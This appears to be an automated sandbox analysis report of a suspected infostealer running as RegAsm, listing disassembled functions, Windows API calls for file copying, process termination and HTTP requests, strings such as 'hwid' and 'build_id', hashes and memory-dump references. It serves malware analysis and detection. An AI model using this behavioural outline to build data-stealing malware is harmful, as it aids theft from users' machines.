                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Internet$lstrcpy$H_prologlstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
                                                                                                                                                                                                                                                                  • String ID: !$"$"$------$------$------$build_id$hwid
                                                                                                                                                                                                                                                                  • API String ID: 1139859944-3346224549
                                                                                                                                                                                                                                                                  • Opcode ID: 7aaac7051688f4dbf0271b8a7a1be2f4b5c184e872ec6aac1368fa27f0b795ae
                                                                                                                                                                                                                                                                  • Instruction ID: 2ce871c215626a6160d89f315a2356af022b94afa82230b3dbecb5e4a39539ba
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7aaac7051688f4dbf0271b8a7a1be2f4b5c184e872ec6aac1368fa27f0b795ae
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 93224D71900249EADB11EBE4C956AEEBBB8AF15308F24407EF506735C2DB781B4CCB65
                                                                                                                                                                                                                                                                  Function 0040678A Relevance: 33.5, APIs: 22, Instructions: 511stringmemoryfileCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 2732 40678a-4067b3 _EH_prolog call 40fb6f 2735 4067b5-4067bd 2732->2735 2736 4067bf-4067d2 call 40fb6f 2732->2736 2737 4067dd call 40f9de 2735->2737 2741 4067d8 2736->2741 2742 40689a-4068a7 call 40fb6f 2736->2742 2743 4067e2-406898 call 40f96a call 410b42 call 40fae3 call 40fa6f call 40fae3 call 40fa6f call 40fa28 call 40f9d5 * 5 2737->2743 2741->2737 2742->2743 2748 4068ad-4068c9 call 40f9d5 * 2 2742->2748 2780 4068e7-406903 call 40fb94 * 2 CopyFileA 2743->2780 2758 406e5b-406e7c call 40f9d5 call 401061 2748->2758 2785 406905-406930 call 40f96a call 40fae3 2780->2785 2786 4068ce-4068e4 call 40f9a1 call 41103c 2780->2786 2795 406936-4069c4 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fa6f call 40fa28 call 40f9d5 call 40fae3 call 40fa28 2785->2795 2796 4069c9-406a9d call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fa6f call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fa6f call 40fae3 call 40fa28 call 40f9d5 2785->2796 2786->2780 2837 406aa0-406ac0 call 40f9d5 call 40fb94 2795->2837 2796->2837 2851 406ac6-406ae1 2837->2851 2852 406e09-406e1b call 40fb94 DeleteFileA call 40fb5b 2837->2852 2858 406df5-406e08 2851->2858 2859 406ae7-406afd GetProcessHeap RtlAllocateHeap 2851->2859 2862 406e20-406e58 call 40fb5b call 40f9d5 * 4 2852->2862 2858->2852 2861 406d71-406d7e 2859->2861 2868 406b02-406baf call 40f96a * 6 call 40fb6f 2861->2868 2869 406d84-406d90 lstrlenA 2861->2869 2862->2758 2907 406bb1-406bb7 2868->2907 2908 406bb9 2868->2908 2871 406d92-406dd0 lstrlenA call 40f9a1 call 4010b1 call 414519 2869->2871 2872 406de6-406df2 memset 2869->2872 2890 406dd5-406de1 call 40f9d5 2871->2890 2872->2858 2890->2872 2909 406bbf-406bd6 call 40f9de call 40fb6f 2907->2909 2908->2909 2914 406be0 2909->2914 2915 406bd8-406bde 2909->2915 2916 406be6-406bf7 call 40f9de call 40fb88 2914->2916 2915->2916 2921 406c06-406d6c call 40fb94 lstrcat * 2 call 40fb94 lstrcat * 2 call 40fb94 lstrcat * 2 call 40fb94 lstrcat * 2 call 40fb94 lstrcat * 2 call 40fb94 lstrcat * 2 call 406404 call 40fb94 lstrcat call 40f9d5 lstrcat call 40f9d5 * 6 2916->2921 2922 406bf9-406c01 call 40f9de 2916->2922 2921->2861 2922->2921
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 0040678F
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FB6F: StrCmpCA.SHLWAPI(?,?,?,00408ADB,00425DD4,00000000), ref: 0040FB78
                                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,00425BD0,?,?,?,00425BA6,?,00000000), ref: 004068FB
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 0041103C: _EH_prolog.MSVCRT ref: 00411041
                                                                                                                                                                                                                                                                    • Part of subcall function 0041103C: memset.MSVCRT ref: 00411063
                                                                                                                                                                                                                                                                    • Part of subcall function 0041103C: OpenProcess.KERNEL32(00001001,00000000,?,?,?,?,00000000,?), ref: 004110EA
                                                                                                                                                                                                                                                                    • Part of subcall function 0041103C: TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000000,?), ref: 004110F8
                                                                                                                                                                                                                                                                    • Part of subcall function 0041103C: CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 004110FF
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00406AED
                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00406AF4
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00406C12
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00425BEC), ref: 00406C20
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00406C32
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00425BF0), ref: 00406C40
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00406D87
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00406D95
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: _EH_prolog.MSVCRT ref: 0041451E
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: CreateThread.KERNEL32(00000000,00000000,0041331B,?,00000000,00000000), ref: 004145C4
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004145CC
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00406DED
                                                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 00406E12
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prologlstrcat$lstrcpy$Processlstrlen$FileHeapmemset$AllocateCloseCopyCreateDeleteHandleObjectOpenSingleTerminateThreadWait
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 4187064601-0
                                                                                                                                                                                                                                                                  • Opcode ID: 36e24937bf1d4d4b699c551673771afee33878a338280c03a368c004d60992b0
                                                                                                                                                                                                                                                                  • Instruction ID: f1cd7e69c5e52c6f3e63b49dcb8d53a5dc271fa5802b9cb46d1a115cf0870736
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 36e24937bf1d4d4b699c551673771afee33878a338280c03a368c004d60992b0
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D227870904249EADF15EBA4DC56AEEBB74AF15308F24407EF406725D2EF782A0CDB25
                                                                                                                                                                                                                                                                  Function 004087AC Relevance: 33.4, APIs: 22, Instructions: 407stringmemoryfileCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 004087B1
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 00410B42: _EH_prolog.MSVCRT ref: 00410B47
                                                                                                                                                                                                                                                                    • Part of subcall function 00410B42: GetSystemTime.KERNEL32(?,00426488,00000001,000000C8,00000000,004265AA), ref: 00410B87
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,?,00425DC8,?,?,?,00425BEA,00000000), ref: 00408894
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00408A01
                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00408A08
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00408B2B
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00425DDC), ref: 00408B39
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00408B4B
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00425DE0), ref: 00408B59
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00408C6C
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00408C7A
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: _EH_prolog.MSVCRT ref: 0041451E
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: CreateThread.KERNEL32(00000000,00000000,0041331B,?,00000000,00000000), ref: 004145C4
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004145CC
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00408CD2
                                                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 00408CF7
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prologlstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyCreateDeleteObjectProcessSingleSystemThreadTimeWaitmemset
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 156379684-0
                                                                                                                                                                                                                                                                  • Opcode ID: 22fe8e8de2aefb1d3e34d00884399cd457849f435fba9ece302e262a30c7cdc7
                                                                                                                                                                                                                                                                  • Instruction ID: 949a679ffb268f122f4c07ae1a0e25cb6c51b6cee585111e1cad529be9b3e042
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 22fe8e8de2aefb1d3e34d00884399cd457849f435fba9ece302e262a30c7cdc7
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 92F15871804149EADF15EBA4DD5ABEDBB74AF15308F20807AF406735D2EF781A08DB25
                                                                                                                                                                                                                                                                  Function 004107A6 Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 146memorycomtimeCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 004107AB
                                                                                                                                                                                                                                                                  • CoInitializeEx.OLE32(00000000,00000000,?,?,?,?,?,?,00426614,00000000,?,Work Dir: In memory,00000000,?,004265FC,00000000), ref: 004107BB
                                                                                                                                                                                                                                                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,?,00426614), ref: 004107CC
                                                                                                                                                                                                                                                                  • CoCreateInstance.OLE32(004282F0,00000000,00000001,00428220,?,?,?,?,?,?,?,00426614,00000000,?,Work Dir: In memory,00000000), ref: 004107E6
                                                                                                                                                                                                                                                                  • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,?,?,?,?,?,00426614,00000000), ref: 0041081C
                                                                                                                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00410877
                                                                                                                                                                                                                                                                    • Part of subcall function 0041070C: CoCreateInstance.OLE32(004280A0,00000000,00000001,00426478,00000000,?), ref: 0041072C
                                                                                                                                                                                                                                                                    • Part of subcall function 0041070C: SysAllocString.OLEAUT32(00000000), ref: 0041073A
                                                                                                                                                                                                                                                                    • Part of subcall function 0041070C: _wtoi64.MSVCRT ref: 0041077C
                                                                                                                                                                                                                                                                    • Part of subcall function 0041070C: SysFreeString.OLEAUT32(?), ref: 00410791
                                                                                                                                                                                                                                                                    • Part of subcall function 0041070C: SysFreeString.OLEAUT32(00000000), ref: 00410794
                                                                                                                                                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,00426614,00000000,?,Work Dir: In memory,00000000,?), ref: 004108AE
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,?,?,?,00426614,00000000,?,Work Dir: In memory,00000000,?), ref: 004108BA
                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,00426614,00000000,?,Work Dir: In memory,00000000,?,004265FC), ref: 004108C1
                                                                                                                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00410903
                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 004108ED
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileH_prologInitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
                                                                                                                                                                                                                                                                  • String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$WQL
                                                                                                                                                                                                                                                                  • API String ID: 3912155974-2016369993
                                                                                                                                                                                                                                                                  • Opcode ID: 48643999b10eee03f0c59d123a06e6169fae4428243e255b133bc3044fa8e62b
                                                                                                                                                                                                                                                                  • Instruction ID: fa5847169170d8b0e9c4b5122c5b556a2ea6954dfc20d5294fea3165d03c3ddc
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 48643999b10eee03f0c59d123a06e6169fae4428243e255b133bc3044fa8e62b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 73415E71A01229BBDB20DB91DC49EEF7B7CFF49710F504016F605A6191D7B89581CBA4
                                                                                                                                                                                                                                                                  Function 00411894 Relevance: 28.3, APIs: 14, Strings: 2, Instructions: 325stringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00411899
                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 004118CA
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,true,?,?,00000104,?,00000104,?,?,00000000), ref: 00411962
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9DE: lstrlenA.KERNEL32(?,00000000,?,00416ABD,004265A7,004265A6,00000000,00000000,?,0041740F), ref: 0040F9E7
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9DE: lstrcpy.KERNEL32(00000000,00000000), ref: 0040FA1B
                                                                                                                                                                                                                                                                  • lstrcpy.KERNEL32(?,?), ref: 00411A19
                                                                                                                                                                                                                                                                  • lstrcpy.KERNEL32(?,00000000), ref: 00411A55
                                                                                                                                                                                                                                                                  • lstrcpy.KERNEL32(?,00000000), ref: 00411A9C
                                                                                                                                                                                                                                                                  • lstrcpy.KERNEL32(?,00000000), ref: 00411AE3
                                                                                                                                                                                                                                                                  • lstrcpy.KERNEL32(?,00000000), ref: 00411B2A
                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 00411C8D
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: lstrcpy$strtok_s$H_prologlstrlen
                                                                                                                                                                                                                                                                  • String ID: false$true
                                                                                                                                                                                                                                                                  • API String ID: 49562497-2658103896
                                                                                                                                                                                                                                                                  • Opcode ID: 437d25f88f9aba824d7ebd3feacc4699e2d5c600ccbc7324c3f55a0d206d7008
                                                                                                                                                                                                                                                                  • Instruction ID: 46384a3b97a1bde4c4669e432c415db955f33f6cf372ed7ba0df213af631809c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 437d25f88f9aba824d7ebd3feacc4699e2d5c600ccbc7324c3f55a0d206d7008
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A5C16EB1C0020DEFDF24EBA4D855EDE7BB9AF14308F10446EF515A7191EB389A89CB64
                                                                                                                                                                                                                                                                  Function 00404F68 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 174networkfileCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00404F6D
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: _EH_prolog.MSVCRT ref: 00403A82
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: ??_U@YAPAXI@Z.MSVCRT ref: 00403AB4
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: ??_U@YAPAXI@Z.MSVCRT ref: 00403ABD
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: ??_U@YAPAXI@Z.MSVCRT ref: 00403AC6
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AE0
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AF0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404FD0
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 00404FE4
                                                                                                                                                                                                                                                                  • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405007
                                                                                                                                                                                                                                                                  • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 0040503D
                                                                                                                                                                                                                                                                  • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405061
                                                                                                                                                                                                                                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040506C
                                                                                                                                                                                                                                                                  • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040508A
                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00405110
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040511B
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 00405124
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 0040512D
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
